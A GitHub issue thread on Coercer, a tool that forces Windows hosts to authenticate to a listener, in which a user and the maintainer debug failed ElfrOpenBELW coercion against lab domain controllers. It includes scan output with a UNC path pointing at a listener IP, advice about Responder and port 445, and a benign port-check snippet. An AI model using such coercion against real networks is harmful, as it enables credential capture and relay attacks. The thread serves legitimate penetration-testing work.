[bug] Coercing through ElfrOpenBELW in \PIPE\eventlog doesn't work. #53

Closed
Shawn24pr opened this issue May 24, 2023 · 5 comments

@Shawn24pr

[+] SMB named pipe '\PIPE\eventlog' is accessible!
   [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)!
      [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\192.168.1.101\r1Qr8iIe\aa')

@p0dalirius self-assigned this May 24, 2023
@p0dalirius changed the title from "The even feature doesn't work." to "[bug] Coercing through ElfrOpenBELW in \PIPE\eventlog doesn't work." May 24, 2023
@p0dalirius added the bug label May 24, 2023

@p0dalirius
Owner

Hi,

I just tested it on the following system:

C:\Users\Administrator>systeminfo

Host Name:                 TDC01
OS Name:                   Microsoft Windows Server 2019 Standard Evaluation
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00431-10000-00000-AA171
Original Install Date:     2/3/2023, 1:17:55 PM
System Boot Time:          5/24/2023, 2:25:37 PM
System Manufacturer:       innotek GmbH
System Model:              VirtualBox
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz
BIOS Version:              innotek GmbH VirtualBox, 12/1/2006
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              fr;French (France)
Time Zone:                 (UTC+01:00) Brussels, Copenhagen, Madrid, Paris
Total Physical Memory:     8,192 MB
Available Physical Memory: 6,087 MB
Virtual Memory: Max Size:  9,472 MB
Virtual Memory: Available: 7,426 MB
Virtual Memory: In Use:    2,046 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    DOMAIN.local
Logon Server:              \\TDC01
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB4514366
                           [02]: KB4486153
                           [03]: KB4512577
                           [04]: KB4512578
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    Yes
                                 DHCP Server:     192.168.1.254
                                 IP address(es)
                                 [01]: 192.168.1.71
                                 [02]: fe80::8de7:7100:8d37:e712
                                 [03]: 2001:861:8c80:e2e0:8de7:7100:8d37:e712
                                 [04]: 2001:861:8c80:e2e0:1d3b:a11a:bc84:4a25
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

And I got the following results:

image

Can you provide more details on the configuration of your environment?

Best regards,

@p0dalirius added the waiting-for-response label May 24, 2023

@Shawn24pr
Author

Hi there,

System config below:

C:\Users\Administrator>systeminfo

Host Name:                 DC01
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00429-70000-00000-AA587
Original Install Date:     5/23/2023, 10:22:52 AM
System Boot Time:          5/23/2023, 9:04:04 PM
System Manufacturer:       Microsoft Corporation
System Model:              Virtual Machine
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 140 Stepping 1 GenuineIntel ~1805 Mhz
BIOS Version:              Microsoft Corporation Hyper-V UEFI Release v4.1, 4/6/2022
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,739 MB
Available Physical Memory: 830 MB
Virtual Memory: Max Size:  4,147 MB
Virtual Memory: Available: 2,020 MB
Virtual Memory: In Use:    2,127 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    lab.local
Logon Server:              \\DC01
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB5004335
                           [02]: KB5005112
                           [03]: KB5005030
Network Card(s):           1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 192.168.1.120
                                 [02]: fe80::90d2:35ec:fc30:200f
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Just cloned the repo now and noticed that even after providing --filter-pipe-name, it scans all of them:

image

@p0dalirius
Owner

I opened an issue for the --filter-pipe-name option and will fix it (#54)

@p0dalirius
Owner

Well yes, if you have Responder running and are using Coercer in scan mode, it cannot work, since Responder is listening on port 445 to receive incoming SMB authentications and Coercer will do the same.

In scan mode you need to be able to listen on port 445 on your machine.
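
Added example, not part of the thread and not Coercer's own code: a pre-flight check for the condition described above, which tries to bind the listening port and reports whether another process already holds it. The function names probe_listen_port and explain are hypothetical, and the error-code handling assumes Linux socket semantics.

```python
import errno
import socket

SMB_PORT = 445  # the port named in the thread


def probe_listen_port(port=SMB_PORT, host="0.0.0.0"):
    """Try to bind and listen on host:port, then release it again.

    Returns 'free', 'in_use' or 'no_permission'.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # No SO_REUSEADDR on purpose: an existing listener must make bind fail.
        sock.bind((host, port))
        sock.listen(1)
        return "free"
    except OSError as exc:
        if exc.errno == errno.EADDRINUSE:
            return "in_use"
        if exc.errno in (errno.EACCES, errno.EPERM):
            return "no_permission"
        raise
    finally:
        sock.close()


def explain(state, port=SMB_PORT):
    """Turn a probe result into a one-line diagnosis."""
    messages = {
        "free": f"TCP {port} is free; a listener can bind it.",
        "in_use": (
            f"TCP {port} is already bound by another process (Responder, in "
            "this thread); a second listener will not receive the "
            "authentication."
        ),
        "no_permission": (
            f"Binding TCP {port} was refused; ports below 1024 usually "
            "need elevated privileges."
        ),
    }
    return messages[state]


if __name__ == "__main__":
    print(explain(probe_listen_port()))
```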

@Shawn24pr
Author

Closing
